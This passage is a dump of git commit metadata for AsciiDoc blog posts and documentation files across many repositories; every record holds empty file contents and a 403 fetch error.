2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"128739a76c0cdd08d43f6cc3ae1b0565515e349f","subject":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-Blog-post-two.adoc'","message":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-Blog-post-two.adoc'","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-Blog-post-two.adoc","new_file":"_posts\/2019-01-31-Blog-post-two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"262b47efa7984e728929a4f4d36503314b800611","subject":"Added news\/2017-12-12-forge-3.8.1.final.asciidoc","message":"Added news\/2017-12-12-forge-3.8.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-12-12-forge-3.8.1.final.asciidoc","new_file":"news\/2017-12-12-forge-3.8.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"94b6269ad186528d81fffc58204998766729fa87","subject":"y2b create post Are You Using Android Pay Yet?","message":"y2b create post Are You Using Android Pay Yet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-12-Are-You-Using-Android-Pay-Yet.adoc","new_file":"_posts\/2016-12-12-Are-You-Using-Android-Pay-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceac0858b3d5a911ddbc2018fc9a71038ab4141f","subject":"Update 2017-09-15-Episode-112-Billionaires-Rave.adoc","message":"Update 
2017-09-15-Episode-112-Billionaires-Rave.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-09-15-Episode-112-Billionaires-Rave.adoc","new_file":"_posts\/2017-09-15-Episode-112-Billionaires-Rave.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d700d6ec05254f7026073d8aa08626a5671e0603","subject":"Update 2016-07-22-Un-secret-entre-pretres.adoc","message":"Update 2016-07-22-Un-secret-entre-pretres.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-Un-secret-entre-pretres.adoc","new_file":"_posts\/2016-07-22-Un-secret-entre-pretres.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ece558903831e61576f2063fd901f25c5d9f9f1","subject":"Update 2014-10-03-Haskell-is-Cool.adoc","message":"Update 2014-10-03-Haskell-is-Cool.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-03-Haskell-is-Cool.adoc","new_file":"_posts\/2014-10-03-Haskell-is-Cool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bef553ed9d7a7c932d20e80b9ef07ec415cd9d19","subject":"Update 2014-10-10-Sort-in-a-Tweet.adoc","message":"Update 2014-10-10-Sort-in-a-Tweet.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-10-Sort-in-a-Tweet.adoc","new_file":"_posts\/2014-10-10-Sort-in-a-Tweet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeebc72b0e7834df265b88e82e872ece87e51523","subject":"Update 2015-02-24-Need-h1-to-save.adoc","message":"Update 2015-02-24-Need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fd9a5e5c7c0dac320cc2885dedf9d3e250a8ae8","subject":"y2b create post Apple Watch - Is it actually Sapphire?","message":"y2b create post Apple Watch - Is it actually Sapphire?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-27-Apple-Watch--Is-it-actually-Sapphire.adoc","new_file":"_posts\/2015-04-27-Apple-Watch--Is-it-actually-Sapphire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d33960cc5a54f1a4b29f10cbeed699729c12b6b8","subject":"y2b create post See 3D Without Glasses On Your Phone!","message":"y2b create post See 3D Without Glasses On Your Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-13-See-3D-Without-Glasses-On-Your-Phone.adoc","new_file":"_posts\/2016-09-13-See-3D-Without-Glasses-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d9a9bca29e9337bebd19038176cf4df6095274d","subject":"Update 2017-01-25-So-youre-starting-a-revolution.adoc","message":"Update 2017-01-25-So-youre-starting-a-revolution.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2017-01-25-So-youre-starting-a-revolution.adoc","new_file":"_posts\/2017-01-25-So-youre-starting-a-revolution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fe258a32093e875fb03c780736c09faad6232ce","subject":"Update 2018-11-28-Some-Great-Books-on-Investment.adoc","message":"Update 2018-11-28-Some-Great-Books-on-Investment.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc","new_file":"_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9620c858120a9b4ba8168f154d47c943888a32b","subject":"Started architecture document","message":"Started architecture document\n","repos":"khartec\/waltz,khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,kamransaleem\/waltz,khartec\/waltz,khartec\/waltz,kamransaleem\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev","old_file":"docs\/design\/completed\/architecture\/ARCHITECTURE.adoc","new_file":"docs\/design\/completed\/architecture\/ARCHITECTURE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73bfc097151fedec2d8490b89da9b2a239b8909f","subject":"Delete Writers_Guide.adoc","message":"Delete Writers_Guide.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"Writers_Guide.adoc","new_file":"Writers_Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88ab36b97b3f47ef76ba6629f36daae2abaabffc","subject":"Update 
2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5575d539b7e5bfbeaa4aa6ea2223510f991d963","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c3f6b09e9f1736999393a1bfae015c36dcb77ecd","subject":"y2b create post Unlock Any MacBook Without The Password","message":"y2b create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-29-Unlock%20Any%20MacBook%20Without%20The%20Password.adoc","new_file":"_posts\/2017-11-29-Unlock%20Any%20MacBook%20Without%20The%20Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee85b362e567b02d1aa1cd6bb09d125e30925141","subject":"Intitial Sample instructions","message":"Intitial Sample instructions\n","repos":"OpenHFT\/Chronicle-Queue-Sample","old_file":"simple-input\/README.adoc","new_file":"simple-input\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue-Sample.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7fb2fa198ed0137e1e252a72bdcc1e4b3f6b8c72","subject":"hello validation","message":"hello validation\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"validation.adoc","new_file":"validation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6eed0293beb27c0d2218dcbbe2aafe7152828f7a","subject":"Link to web-api pom","message":"Link to web-api pom\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/EE.adoc","new_file":"Best practices\/EE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c38fba0e818372004bce77075915df0c1c7d88dc","subject":"Update 2016-03-28-android.adoc","message":"Update 2016-03-28-android.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-28-android.adoc","new_file":"_posts\/2016-03-28-android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf013a89a64e067960d33f8fc876072c45c4758b","subject":"Update 2016-06-30-teszt-2.adoc","message":"Update 2016-06-30-teszt-2.adoc","repos":"Olika120\/Olika120.github.io,Olika120\/Olika120.github.io,Olika120\/Olika120.github.io,Olika120\/Olika120.github.io","old_file":"_posts\/2016-06-30-teszt-2.adoc","new_file":"_posts\/2016-06-30-teszt-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Olika120\/Olika120.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6183cd9a41e3f584b654b7b6a176b55891d624b","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56f003e1484bba71409abcdc773c7e92de6e8be7","subject":"y2b create post MUSCLE GAMING? (Shape Up Demo)","message":"y2b create post MUSCLE GAMING? 
(Shape Up Demo)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-13-MUSCLE-GAMING-Shape-Up-Demo.adoc","new_file":"_posts\/2014-11-13-MUSCLE-GAMING-Shape-Up-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfd2d3fb6d42dc72f7b033e552ec8839ed05aa4a","subject":"es6 tips","message":"es6 tips\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"es6.adoc","new_file":"es6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"0955967b2bec6d6ca18863ed09d3333ee20784d5","subject":"CL - starting swank server","message":"CL - starting swank server\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"798bd97c712e1784b89652cb641062d4fdda7f53","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"166690c2a69e7557afa5f475889e8f644239abe6","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e29516f294b4fffec1f0cb7156773b0aa0f6d2","subject":"Move readme file in the main directory","message":"Move readme file in the main directory","repos":"arduino-org\/CiaoMCU","old_file":"Ciao\/README.adoc","new_file":"Ciao\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arduino-org\/CiaoMCU.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aa2a028d3a9f8bb4ba94ef3f2530152445caecf","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 
2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b369c07ccee7a87600c1460f15463d5c562a2762","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b67cc490d66e46deb1721b997c120edcb4407bf8","subject":"Add my resume","message":"Add my resume\n\nChange-Id: Idb5fb2ac6cecfdd1fea7eb01060dbaa29b402d52\n","repos":"BruceZu\/KeepTry,BruceZu\/KeepTry,BruceZu\/KeepTry,BruceZu\/sawdust,BruceZu\/sawdust,BruceZu\/sawdust,BruceZu\/sawdust,BruceZu\/KeepTry","old_file":"Resume_BruceZu.adoc","new_file":"Resume_BruceZu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BruceZu\/sawdust.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92bb35bdf05e3a8178445d0fe37af34e1633b5c0","subject":"Update 2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","message":"Update 2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","new_file":"_posts\/2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b915df7f335ec947cfc8339aa8f59be0188e4469","subject":"[examples] Add a quickstart guide for YCSB","message":"[examples] Add a quickstart guide for YCSB\n\nAdds a brief quickstart guide to show the steps to run YCSB\nagainst a Kudu cluster.\n\nChange-Id: I26255c9389a8bb59af1009cd67f720149e59f4a1\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/15204\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"examples\/quickstart\/ycsb\/README.adoc","new_file":"examples\/quickstart\/ycsb\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/helifu\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"d763911db3edb0e528ffe24a250f6b24ebecbf15","subject":"Update 2017-01-13.adoc","message":"Update 2017-01-13.adoc","repos":"berryzed\/tech-blog,berryzed\/tech-blog,berryzed\/tech-blog,berryzed\/tech-blog","old_file":"_posts\/2017-01-13.adoc","new_file":"_posts\/2017-01-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/berryzed\/tech-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49f2da874bef1e1c3e59e05abf4684680d7ce4f","subject":"Fixed icon size","message":"Fixed icon size\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76f407e1583241c09eee6658b63801a6717694ad","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"578c09465291868f885c01d79b86cfbc28c72b32","subject":"Update 2016-01-20-Hello-and-welcome-to-my-blog.adoc","message":"Update 2016-01-20-Hello-and-welcome-to-my-blog.adoc","repos":"romanegunkov\/romanegunkov.github.io,romanegunkov\/romanegunkov.github.io,romanegunkov\/romanegunkov.github.io","old_file":"_posts\/2016-01-20-Hello-and-welcome-to-my-blog.adoc","new_file":"_posts\/2016-01-20-Hello-and-welcome-to-my-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/romanegunkov\/romanegunkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da8ea58f31569651cba8c4d917a469eb66cd304e","subject":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","message":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90654048bf8d8922e70d041dfe4800b12c109a78","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dab0affca226b144d58809de55ef5a47efe53bd1","subject":"Documented the prefixes of html ids","message":"Documented the prefixes of html ids\n","repos":"uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"f7172eda35a74232be2c0f42894db8d376ce63ed","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69a49b176a14bf4e9046998f14a5597fb18f152c","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a3e258e6622afc9341b3482dcea624abc5447e7","subject":"Create Ruby.adoc","message":"Create Ruby.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Ruby.adoc","new_file":"Linux\/Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"654ad0908d80e95ce0d24ecfb12eadcdddc580b3","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ebcb77aa911aae76c48e717af24e643cb81908d","subject":"[docs] add Hive Metastore integration","message":"[docs] add Hive Metastore integration\n\nChange-Id: I12939c8f2245450ad46898c2050451b090c7ea01\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11798\nTested-by: Kudu Jenkins\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Hao Hao 
